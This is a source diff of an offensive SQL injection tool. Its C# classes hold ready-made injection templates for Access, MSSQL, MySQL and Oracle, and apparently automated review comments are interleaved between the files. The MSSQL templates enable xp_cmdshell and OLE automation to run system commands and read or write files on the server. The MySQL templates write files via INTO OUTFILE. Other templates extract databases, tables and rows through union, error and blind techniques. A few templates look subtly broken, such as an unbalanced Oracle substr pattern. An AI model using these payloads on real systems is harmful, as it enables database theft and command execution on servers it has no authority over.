+ public Boolean isMuStr = false;//开启多字节
+ public ListViewItem lvi = null;
+ public int data_count =0;
+ }
+}
diff --git a/SuperSQLInjection/model/InjectType.cs b/SuperSQLInjection/model/InjectType.cs
new file mode 100644
index 0000000..c091311
--- /dev/null
+++ b/SuperSQLInjection/model/InjectType.cs
@@ -0,0 +1,16 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum InjectType
+ {
+ UnKnow = 0,
+ Bool=1,
+ Error=2,
+ Union = 3,
+ Sleep=4
+ }
+}
diff --git a/SuperSQLInjection/model/Injection.cs b/SuperSQLInjection/model/Injection.cs
new file mode 100644
index 0000000..962250e
--- /dev/null
+++ b/SuperSQLInjection/model/Injection.cs
@@ -0,0 +1,20 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ public class Injection
+ {
+ public String url="";
+ public int index = 0;
+ public bool isInjection =false;
+ public String injectType = "";
+ public String payload="";
+ public String paramName = "";
+ public String dbType = "";
+ public String remark = "";
+ public String testUrl = "";
+
+ }
+}
diff --git a/SuperSQLInjection/model/KeyType.cs b/SuperSQLInjection/model/KeyType.cs
new file mode 100644
index 0000000..7484139
--- /dev/null
+++ b/SuperSQLInjection/model/KeyType.cs
@@ -0,0 +1,15 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum KeyType
+ {
+ Key=0,
+ Code=1,
+ Length=2,
+ Time = 3
+ }
+}
diff --git a/SuperSQLInjection/model/SelectNode.cs b/SuperSQLInjection/model/SelectNode.cs
new file mode 100644
index 0000000..7dbf0c7
--- /dev/null
+++ b/SuperSQLInjection/model/SelectNode.cs
@@ -0,0 +1,16 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection.model
+{
+ public class SelectNode
+ {
+ public TreeNode tn = new TreeNode();
+ public int limit = 0;
+ public String dbname = "";
+ public String tableName = "";
+ public String columnName = "";
+ }
+}
diff --git a/SuperSQLInjection/model/SerializableDictionary.cs b/SuperSQLInjection/model/SerializableDictionary.cs
new file mode 100644
index 0000000..062ad94
--- /dev/null
+++ b/SuperSQLInjection/model/SerializableDictionary.cs
@@ -0,0 +1,62 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Xml;
+using System.Xml.Schema;
+using System.Xml.Serialization;
+
+namespace SuperSQLInjection.model
+{
+
+ [Serializable]
+ public class SerializableDictionary : Dictionary, IXmlSerializable
+ {
+ public SerializableDictionary() { }
+ public void WriteXml(XmlWriter write) // Serializer
+ {
+ XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
+ XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
+
+ foreach (KeyValuePair kv in this)
+ {
+ write.WriteStartElement("SerializableDictionary");
+ write.WriteStartElement("key");
+ KeySerializer.Serialize(write, kv.Key);
+ write.WriteEndElement();
+ write.WriteStartElement("value");
+ ValueSerializer.Serialize(write, kv.Value);
+ write.WriteEndElement();
+ write.WriteEndElement();
+ }
+ }
+ public void ReadXml(XmlReader reader) // Deserializer
+ {
+ reader.Read();
+ XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
+ XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));
+
+ while (reader.NodeType != XmlNodeType.EndElement)
+ {
+
+ reader.ReadStartElement("SerializableDictionary");
+ reader.ReadStartElement("key");
+ TKey tk = (TKey)KeySerializer.Deserialize(reader);
+ reader.ReadEndElement();
+ reader.ReadStartElement("value");
+ TValue vl = (TValue)ValueSerializer.Deserialize(reader);
+ reader.ReadEndElement();
+ reader.ReadEndElement();
+ this.Add(tk, vl);
+ reader.MoveToContent();
+ }
+ reader.ReadEndElement();
+
+ }
+ public XmlSchema GetSchema()
+ {
+ return null;
+ }
+ }
+ }
+
diff --git a/SuperSQLInjection/model/ServerInfo.cs b/SuperSQLInjection/model/ServerInfo.cs
new file mode 100644
index 0000000..f87caaa
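Review bot: `ReadXml` in SerializableDictionary.cs does not handle an empty element. A dictionary saved with no entries is most likely written as a self-closing element; `reader.Read()` then steps past it, the `while` loop starts on whatever node follows, and `ReadStartElement("SerializableDictionary")` either throws or consumes a sibling's content. The usual guard at the top of the method is `bool wasEmpty = reader.IsEmptyElement; reader.Read(); if (wasEmpty) return;`. Since `DataBase.tables` uses this type, a saved project with an empty table list would hit this on load.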
--- /dev/null
+++ b/SuperSQLInjection/model/ServerInfo.cs
@@ -0,0 +1,30 @@
+using System;
+using System.Collections.Generic;
+using System.Net;
+using System.Text;
+
+namespace model
+{
+ public class ServerInfo
+ {
+ public String host = "";//host主机头
+ public String url = "";//pathAndQuery
+ public int port = 80;
+ public String request = "";
+ public String encoding = "";
+ public String header = "";
+ public String body = "";
+ public String reuqestBody = "";
+ public String reuqestHeader = "";
+ public Dictionary headers = new Dictionary();
+ public String response = "";
+ public String gzip = "";
+ public int length = 0;
+ public int code = 0;
+ public int location = 0;
+ public int runTime = 0;//获取网页消耗时间,毫秒
+ public int sleepTime = 0;//休息时间
+ public String cookies = "";
+ public Boolean timeout = false;
+ }
+}
diff --git a/SuperSQLInjection/model/URL.cs b/SuperSQLInjection/model/URL.cs
new file mode 100644
index 0000000..e60183d
--- /dev/null
+++ b/SuperSQLInjection/model/URL.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ class URL
+ {
+ public String url;
+ public int level;
+ public URL(String url, int level) {
+
+ this.url = url;
+ this.level = level;
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/payload/Access.cs b/SuperSQLInjection/payload/Access.cs
new file mode 100644
index 0000000..cbbcde7
--- /dev/null
+++ b/SuperSQLInjection/payload/Access.cs
@@ -0,0 +1,79 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace SuperSQLInjection.payload +{ + class Access + { + //获取数据条数 + public static String data_count = "(select count(*) from {table})"; + + //判断条数 + public static String bool_datas_count = " and " + data_count + ">={len}"; + + public static String substr = "mid(({data}),{index},1)"; + + //bool方式字符长度判断 + public static String bool_length = " and len({data})>{len}"; + + public static String bool_value = " and {data}>{len}"; + + //获取行数据 + public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from {table} order by {orderby} asc) t order by t.{orderby} desc)"; + + //union获取值 + public static String union_value = " and 1=2 union all select {data} from {table}"; + + //多字符 + public static String unicode_value = "ascw(mid({data},{index},1))"; + + + public static String getUnionDataValue(int columnsLen, int showIndex, List columns, String table, String index) + { + StringBuilder sb = new StringBuilder(); + String data = "chr(94)&chr(94)&chr(33)&" + Comm.unionColumns(columns, "&chr(36)&chr(36)&chr(36)&") + "&chr(33)&chr(94)&chr(94)"; + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index).Replace("{orderby}", columns[0])); + sb.Append(","); + } + else + { + sb.Append("1,"); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + + public static String getUnionDataValue(int columnsLen, int showIndex, int Fill, String dataPayLoad) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append("(chr(94)&chr(94)&chr(33)&" + dataPayLoad + "&chr(33)&chr(94)&chr(94)),"); + } + else + { + sb.Append(Fill + ","); + } + } + sb.Remove(sb.Length - 1, 1); + return 
union_value.Replace("{data}", sb.ToString()); + } + public static String getBoolDataPayLoad(String column,List columns,String dbName, String table, int index) + { + String data = data_value.Replace("{data}",column).Replace("{allcolumns}",Comm.unionColumns(columns,",")).Replace("{orderby}",columns[0]); + String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString()); + return payload; + } + + + } +} diff --git a/SuperSQLInjection/payload/Comm.cs b/SuperSQLInjection/payload/Comm.cs new file mode 100644 index 0000000..d40b20a --- /dev/null +++ b/SuperSQLInjection/payload/Comm.cs 
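Review bot: In `getBoolDataPayLoad` (Access.cs) the second statement repeats work that cannot have any effect. `{data}` was already substituted on the line above, and the Access `data_value` template has no `{dbname}` placeholder, so `.Replace("{dbname}", dbName)` and the second `.Replace("{data}", column)` are no-ops and the `dbName` parameter is unused. Dropping both calls and documenting that `dbName` is ignored for Access would make the method say what it does. `columns[0]` here and in the first `getUnionDataValue` overload throws on an empty list, so a check with a clear message belongs at the top. The templates are `public static String` fields that any code can reassign; `public const string` or `static readonly` would pin them.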
@@ -0,0 +1,69 @@ +using System; +using System.Collections.Generic; +using System.Text; + +namespace SuperSQLInjection.payload +{ + class Comm + { + public static String exists_table = " and exists(select 1 from {0})"; + public static String exists_column = " and exists(select {0} from {1})"; + public static String truePayload = " and 1=1"; + public static String falsePayload = " and 1=2"; + + public static String unionColumns(List columns, String unionStr) + { + StringBuilder sb = new StringBuilder(); + foreach (String column in columns) + { + + sb.Append(column + unionStr); + } + sb.Remove(sb.Length - unionStr.Length, unionStr.Length); + return sb.ToString(); + } + + + public static String unionColumnCountTest(int maxColumn,int fill) + { + StringBuilder sb = new StringBuilder(" and 1=2 union all select "); + for (int i = 1; i <= maxColumn;i++ ) + { + sb.Append(fill+"+"+i+","); + } + sb.Remove(sb.Length - 1, 1); + return sb.ToString(); + } + + public static String unionColumnCountTestByOracle(int maxColumn, String fill) + { + StringBuilder sb = new StringBuilder(" and 1=2 union all select "); + for (int i = 1; i <= maxColumn; i++) + { + sb.Append(fill + ","); + } + sb.Remove(sb.Length - 1, 1); + return sb.ToString()+" from dual"; + } + + public static String unionColumnCountTestByOracle(int maxColumn,int testIndex,String fill) + { + StringBuilder sb = new StringBuilder(" and 1=2 union all select "); + for (int i = 1; i <= maxColumn; i++) + { + if (i == testIndex) + { + sb.Append(fill + ","); + } + else + { + sb.Append("null" + ","); + } + } + sb.Remove(sb.Length - 1, 1); + return sb.ToString() + " from dual"; + } + + + } +} diff --git a/SuperSQLInjection/payload/MSSQL.cs b/SuperSQLInjection/payload/MSSQL.cs new file mode 100644 index 0000000..df17f48 --- /dev/null +++ b/SuperSQLInjection/payload/MSSQL.cs 
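Review bot: `unionColumns` in Comm.cs throws on an empty `columns` list. Nothing is appended, so `sb.Remove(sb.Length - unionStr.Length, unionStr.Length)` is called with a negative start index. Assuming `columns` is a `List<String>` (the type argument is lost in this rendering), `return String.Join(unionStr, columns);` gives the same result for non-empty input, returns an empty string otherwise, and needs no trimming step. The same append-then-trim pattern in `unionColumnCountTest` and both `unionColumnCountTestByOracle` overloads silently eats the trailing space of the prefix when `maxColumn` is 0, so those methods should reject `maxColumn < 1` up front.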
@@ -0,0 +1,271 @@ +using System; +using System.Collections.Generic; +using System.Text; +using tools; + +namespace SuperSQLInjection.payload +{ + class MSSQL + { + //加载对应配置(需要读取的环境变量) + public static String path = "config/sqlserver/ver.txt"; + public static List vers = FileTool.readFileToList(path); + + + //数据库数量 + public static String dbs_count = "(select count(*) from [master]..[sysdatabases])"; + //表数量 + public static String tables_count = "(select count(*) from [{dbname}]..[sysobjects] where xtype=0x55)"; + //列数量 + public static String columns_count = "(select count(*) from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))"; + //获取数据条数 + public static String data_count = "(select count(*) from [{dbname}]..[{table}])"; + + + //获取数据库名 + public static String db_value = "(select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc)"; + //获取表名称 + public static String table_value = "(select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55))"; + //获取列名称 + public static String column_value = "(select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}')))"; + + + //获取数据库数量bool方式 + public static String bool_db_count = " and " + dbs_count + ">{len}"; + //获取表数量bool + public static String bool_tables_count = " and " + tables_count + ">{len}"; + //获取列数量bool + public static String bool_columns_count = " and " + columns_count + ">{len}"; + + public static String bool_datas_count = " and " + data_count + ">={len}"; + + //多字符 + public static String unicode_value = "cast(unicode(substring({data},{index},1)) as varchar(100))"; + + public static String substr = "substring(({data}),{index},1)"; + public static String substr_value = "substring(({data}),{index},{len})"; + + 
//bool方式字符长度判断 + public static String bool_length = " and len({data})>{len}"; + public static String bool_dataLength = " and datalength({data})>{len}"; + public static String bool_value = " and {data}>{len}"; + + //bool方式获取值 + + //每个unicode值范围0-9 + public static String bool_unicode_value = " and (substring({data},{index},1))>{len}"; + + //获取行数据 + public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from [{dbname}]..[{table}] order by {orderby}) t order by {orderby} desc)"; + + //union获取值 + public static String union_value = " and 1=2 union all select {data}"; + + //error方式 + public static String error_value = " or convert(int,(char(94)+char(94)+char(33)+cast({data} as varchar(2000))+char(33)+char(94)+char(94)))=1"; + + + //cmd + public static String createTable = ";drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data text);exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd--"; + public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))"; + public static String cmdDataCount = "(select count(*) from ssqlinjection)"; + public static String dropTable = ";drop table ssqlinjection;--"; + + + //文件读写 + public static String witeFileByFileSystemObject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;--"; + public static String witeFileBySP_MakeWebTask = ";exec 
sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;--"; + public static String witeFileByBackDataBase = ";drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;--"; + public static String readFileByFileSystemobject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);--"; + + //读文件的的payload + public static String file_content = "(select data from ssqlinjection)"; + + + + /// + /// 获取union的payload + /// + /// 列长 + /// 显示列 + /// 填充 + /// 数据库名 + /// 表名 + /// 获取数据的字段 + /// 第几行数据,1开始 + public static String getUnionDataValue(int columnsLen,int showIndex,int Fill,String dbname,String table,List columns,int index) + { + StringBuilder sb = new StringBuilder(); + String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]); + for (int i = 1; i <= columnsLen; i++) + { + + if (i == showIndex) + { + String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString()); + sb.Append("(char(94)+char(94)+char(33)+cast(" + d + " as 
varchar(8000))+char(33)+char(94)+char(94)),"); + } + else + { + + sb.Append(Fill + ","); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + /// + /// + /// 列长 + /// 显示列 + /// 填充 + /// 值payload + /// + public static String getUnionDataValue(int columnsLen, int showIndex, int Fill,String dataPayLoad) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append("(char(94)+char(94)+char(33)+" + "cast(" + dataPayLoad + " as varchar(8000))+char(33)+char(94)+char(94)),"); + } + else + { + sb.Append(Fill + ","); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + public static String getUnionDataValueByCMD(int columnsLen, int showIndex, String dataPayLoad) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append("(char(94)+char(94)+char(33)+cast(" + (dataPayLoad) + " as varchar(8000))+char(33)+char(94)+char(94)),"); + } + else + { + sb.Append("1,"); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + /// + /// 获取数据,error + /// + /// 列长 + /// 显示列 + /// 填充 + /// + /// 数据库名 + /// 表名 + /// 第几行数据,1开始 + /// + public static String getUnionDataValue(int columnsLen, int showIndex, int Fill, String dataPayLoad,String dbname,String table,String index) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append("(char(94)+char(94)+char(33)+" + (("cast(" + dataPayLoad + " as varchar(5000))").Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "+char(33)+char(94)+char(94)),"); + } + else + { + sb.Append(Fill + ","); + } + } + sb.Remove(sb.Length - 1, 1); + return union_value.Replace("{data}", sb.ToString()); + } + + + /// + /// 调用前需调用setDataValue方法 + /// + /// 列长 + /// 显示列 + /// 填充 + /// 数据库名 + /// 表名 + 
/// 获取数据的字段 + /// 第几行数据,1开始 + public static String getErrorDataValue(String dbname, String table,int index,List columns) + { + String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]); + String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{column}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString()); + return error_value.Replace("{data}", d); + } + + /// + /// 多字段拼接 + /// + /// + /// + public static String concatAllColumns(List columns) + { + StringBuilder sb = new StringBuilder(); + foreach (String column in columns) + { + sb.Append(column); + sb.Append(","); + } + sb.Remove(sb.Length - 1, 1); + return sb.ToString(); + } + /// + /// 多字段拼接,带连接符 + /// + /// + /// + public static String concatAllColumnsByConcatStr(List columns) + { + StringBuilder sb = new StringBuilder(); + foreach (String column in columns) + { + + sb.Append("cast(isnull(" + column + ",0x20) as varchar(5000))+char(36)+char(36)+char(36)+"); + } + sb.Remove(sb.Length - 28, 28); + return sb.ToString(); + } + + + /// + /// 值的长度 + /// + /// + /// + public static String getBoolLengthPayLoad(String dataStr,int len) + { + + bool_length.Replace("{data}",unicode_value.Replace("{data}", dataStr)).Replace("{len}",len.ToString()); + + return dataStr; + } + + /// + /// 获得bool方式值payload + /// + /// 对应值的查询SQL + /// 数据库名 + /// 表名 + /// 下标 + /// + public static String getBoolDataPayLoad(String column,List columns,String dbName,String table,int index) + { + String data = data_value.Replace("{data}", "cast(isnull("+column+",0x20) as varchar)").Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]); + String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString()); + return payload; + } + + } +} 
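Review bot: The `createTable`, `witeFileByFileSystemObject`, `witeFileBySP_MakeWebTask` and `readFileByFileSystemobject` templates in MSSQL.cs switch server-wide options on through `sp_configure` (`xp_cmdshell`, `ole automation procedures`, `web assistant procedures`) and create an `ssqlinjection` table or database, yet nothing in the class records that these changes persist on the target. The only cleanup template in the hunk, `dropTable`, drops the table and leaves the options enabled. A comment above the `//cmd` group should say so, for example `// NOTE: changes server-wide sp_configure options and creates ssqlinjection objects on the target; dropTable removes only the table`, so an operator knows the target needs restoring afterwards. On the defending side, unexpected `sp_configure` changes to these options and objects named `ssqlinjection` are the traces to look for in SQL Server audit data.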
diff --git a/SuperSQLInjection/payload/MySQL5.cs b/SuperSQLInjection/payload/MySQL5.cs new file mode 100644 index 0000000..d8e63da --- /dev/null +++ b/SuperSQLInjection/payload/MySQL5.cs 
@@ -0,0 +1,282 @@ +using System; +using System.Collections.Generic; +using System.Text; +using tools; + +namespace SuperSQLInjection.payload +{ + class MySQL5 + { + //加载对应配置(需要读取的环境变量) + public static String path = "config/mysql5/ver.txt"; + public static List vers = FileTool.readFileToList(path); + + public static String char_length = "(select char_length({data}))"; + + //数据库数量 + public static String dbs_count = "(select count(*) from information_schema.schemata)"; + //表数量 + public static String tables_count = "(select count(*) from information_schema.tables where table_schema='{dbname}')"; + //列数量 + public static String columns_count = "(select count(*) from information_schema.columns where table_schema='{dbname}' and table_name='{table}')"; + + + //获取数据库名 + public static String db_value = "(select schema_name from information_schema.schemata limit {index},1)"; + //获取表名称 + public static String table_value = "(select table_name from information_schema.tables where table_schema='{dbname}' limit {index},1)"; + //获取列名称 + public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)"; + + + + public static String bool_length = "char_length({data})"; + public static String bool_value = "ascii(mid({data},{index},1))"; + + + //获取数据库数量bool方式 + public static String bool_db_count = " and " + dbs_count + ">{len}"; + + //获取表数量bool + public static String bool_tables_count = " and " + tables_count + ">{len}"; + + //获取列数量bool + public static String bool_columns_count = " and " + columns_count + ">{len}"; + + + //多字符长度判断 + public static String mu_value = "(hex(convert((mid({data},{index},1)) using UTF8)))"; + + //bool方式字符长度判断 + public static String ver_length = " and "+ bool_length + ">{len}"; + //bool方式获取值 + public static String ver_value = " and "+ bool_value + ">{len}"; + + //获取行数据bool + public static String data_value = "(select {columns} from {dbname}.{table} limit {limit},1)"; 
+ + + + //union获取数据条数 + public static String data_count = "(select count(*) from {dbname}.{table})"; + //bool判断数据条数 + public static String bool_datas_count = " and " + data_count + ">={len}"; + + //union获取值 + public static String union_value = " and 1=2 union all select {data}"; + + //error方式 + public static String error_value = " or (select 1 from (select count(*),concat(({data}),floor(rand(0)*2))x from information_schema.tables group by x)a)"; + + public static String hex = "(select hex({data}))"; + public static String hex_value = "(select hex(convert(({data}) using UTF8)))"; + public static String substr_value = "(select substr({data},{start},{len}))"; + public static String getBoolCountBySleep(String data,int maxTime) + { + return " AND (SELECT * FROM (SELECT(SLEEP("+ maxTime + "-(IF(("+data+ ">{len}), 0, " + maxTime + ")))))"+Tools.RandStr(4)+")"; + } + + /// + /// 生成联合查询的列的字符串,如1,2,3,用于union注入 + /// + /// 列长度 + /// 显示列是第几列 + /// 其他列填充字符 + /// 填充显示列的对应列集合数据 + /// 表明 + /// 数据库名 + /// limit下标,没有填写-1 + /// + public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, String fill, List columns, String table, String dbName, int limit) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + + if (i == showIndex) + { + sb.Append(creatMySQLColumnStr(columns) + ","); + } + else + { + + sb.Append(fill + ","); + } + } + sb.Remove(sb.Length - 1, 1).ToString(); + + if (!Tools.checkEmpty(dbName)) + { + sb.Append(" from " + dbName + "."); + if (!Tools.checkEmpty(table)) + { + sb.Append(table); + } + + } + else + { + if (!Tools.checkEmpty(table)) + { + sb.Append(" from " + table); + } + } + if (limit >= 0) + { + sb.Append(" limit " + limit + ",1"); + + } + return sb.ToString(); + } + + public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String data) + { + StringBuilder sb = new StringBuilder(); + for (int i = 1; i <= columnsLen; i++) + { + + if (i == showIndex) + { + 
sb.Append(creatMySQLColumnStr(data) + ","); + } + else + { + + sb.Append("1,"); + } + } + return sb.Remove(sb.Length - 1, 1).ToString(); + } + + public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex, String path,String content) + { + StringBuilder sb = new StringBuilder(" union select "); + for (int i = 1; i <= columnsLen; i++) + { + + if (i == dataIndex) + { + sb.Append(Tools.strToHex(content,"UTF-8")+","); + } + else + { + + sb.Append("1,"); + } + } + sb.Remove(sb.Length - 1, 1); + sb.Append(" into dumpfile '"+path+"'"); + return sb.ToString(); + } + + public static String creatMySQLWriteFileByUnionByMuSQL(String path, String content) + { + return ";select " + Tools.strToHex(content,"UTF-8") + " into outfile '" + path + "'"; + } + + public static String creatMySQLColumnsStrByError(List columns, String table, String dbName, int limit) + { + StringBuilder sb = new StringBuilder(); + sb.Append(creatMySQLColumnStr(columns)); + + if (!Tools.checkEmpty(dbName)) + { + sb.Append(" from " + dbName + "."); + if (!Tools.checkEmpty(table)) + { + sb.Append(table); + } + } + else + { + if (!Tools.checkEmpty(table)) + { + sb.Append(" from " + table); + } + } + if (limit >= 0) + { + sb.Append(" limit " + limit + ",1"); + + } + return sb.ToString(); + } + + + public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit) + { + StringBuilder sb = new StringBuilder(); + sb.Append(creatMySQLColumnStr(column)); + + if (!Tools.checkEmpty(dbName)) + { + sb.Append(" from " + dbName + "."); + if (!Tools.checkEmpty(table)) + { + sb.Append(table); + } + } + else + { + if (!Tools.checkEmpty(table)) + { + sb.Append(" from " + table); + } + } + if (limit >= 0) + { + sb.Append(" limit " + limit + ",1"); + + } + return sb.ToString(); + } + + + + /// + /// 生成查询列数据 + /// + /// 列明 + /// + public static String creatMySQLColumnStr(List columns) + { + StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); + for (int i = 0; i < 
columns.Count; i++) + { + if (columns.Count > 1) + { + sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,"); + } + else + { + return creatMySQLColumnStr(columns[i]); + } + + } + + if (columns.Count > 1) + { + sb.Remove(sb.Length - 9, 9); + } + sb.Append("0x215e5e)"); + return sb.ToString(); + + } + + + /// + /// 生成查询列数据 + /// + /// 列明 + /// + public static String creatMySQLColumnStr(String column) + { + StringBuilder sb = new StringBuilder("concat(0x5e5e21,"); + sb.Append(column); + sb.Append(",0x215e5e)"); + return sb.ToString(); + + } + + } +} diff --git a/SuperSQLInjection/payload/Oracle.cs b/SuperSQLInjection/payload/Oracle.cs new file mode 100644 index 0000000..a667955 --- /dev/null +++ b/SuperSQLInjection/payload/Oracle.cs 
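Review bot: The hex literals in both `creatMySQLColumnStr` overloads are undocumented magic values: `0x5e5e21` and `0x215e5e` decode to `^^!` and `!^^`, the markers wrapped around each returned value, and `0x242424` is the `$$$` column separator. A comment such as `// 0x5e5e21 = "^^!", 0x215e5e = "!^^" (value markers); 0x242424 = "$$$" (column separator)` would also explain the `sb.Remove(sb.Length - 9, 9)` that strips the last `0x242424,`. The same markers appear as `char(94)+char(94)+char(33)` in MSSQL.cs and `chr(94)||chr(94)||chr(33)` in Oracle.cs, so one shared named constant would keep the three files in step. Because the values are fixed, they are also a stable string to match on in web-server and database logs when looking for this tool's traffic.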
@@ -0,0 +1,179 @@ +using System; +using System.Collections.Generic; +using System.Text; +using tools; + +namespace SuperSQLInjection.payload +{ + class Oracle + { + //加载对应配置(需要读取的环境变量) + public static String path = "config/oracle/ver.txt"; + public static List vers = FileTool.readFileToList(path); + + + public static String err_hex_len = "(select length(rawtohex({data})) from dual)"; + + //数据库数量 + public static String dbs_count = "(select count(distinct(owner)) from sys.all_tables)"; + //表数量 + public static String tables_count = "(select count(*) from sys.all_tables where owner='{dbname}')"; + //列数量 + public static String columns_count = "(select count(*) from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')"; + + + //获取数据库名 + public static String db_value = "(select owner from (select owner,rownum as limit from (select distinct(owner) from sys.all_tables)) where limit={index})"; + //获取表名称 + public static String table_value = "(select table_name from (select table_name,rownum as limit from (select table_name from sys.all_tables where owner='{dbname}')) where limit={index})"; + //获取列名称 + public static String column_value = "(select column_name from (select column_name,rownum as limit from (select column_name from sys.all_tab_columns where owner='{dbname}' and table_name='{table}')) where limit={index})"; + + + + + + //获取数据库数量bool方式 + public static String bool_db_count = " and " + dbs_count + ">{len}"; + //获取表数量bool + public static String bool_tables_count = " and " + tables_count + ">{len}"; + //获取列数量bool + public static String bool_columns_count = " and " + columns_count + ">{len}"; + + + + public static String substr = "substr(({data})),{index},1)"; + //多字节 + public static String hex_value = "rawtohex(substr({data},{index},1))"; + + //bool方式字符长度判断 + public static String bool_length = " and length({data})>{len}"; + + //bool方式获取值 + public static String bool_value = " and ascii(substr({data},{index},1))>{len}"; + + //获取行数据 + public static String 
data_value = "(select {data} from (select {allcolumns},rownum as limit from (select * from {dbname}.{table})) where limit={index})"; + + + //union获取数据条数 + public static String union_data_count = "(select count(*) from {dbname}.{table})"; + public static String bool_datas_count = " and " + union_data_count + ">={len}"; + + //union获取值 + public static String union_value = " and 1=2 union all select {data} from dual"; + + //error方式 + public static String error_value = " and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||rawtohex(cast(({data}) as varchar(256)))||chr(58)||chr(45)||chr(45)||chr(62))) from dual)"; + + public static String substr_error_value = " and 1=(select upper(xmltype(chr(60)||chr(58)||chr(45)||chr(45)||chr(58)||substr(rawtohex(cast(({data}) as varchar(256))),{start},{len})||chr(58)||chr(45)||chr(45)||chr(62))) from dual)"; + + public static String getUnionDataValue(int columnsLen, int showIndex, String dataPayLoad, String dbname, String table, String index) + { + StringBuilder sb = new StringBuilder(); + + for (int i = 1; i <= columnsLen; i++) + { + if (i == showIndex) + { + sb.Append("(chr(94)||chr(94)||chr(33)||"+dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index) + "||chr(33)||chr(94)||chr(94)),"); + } + 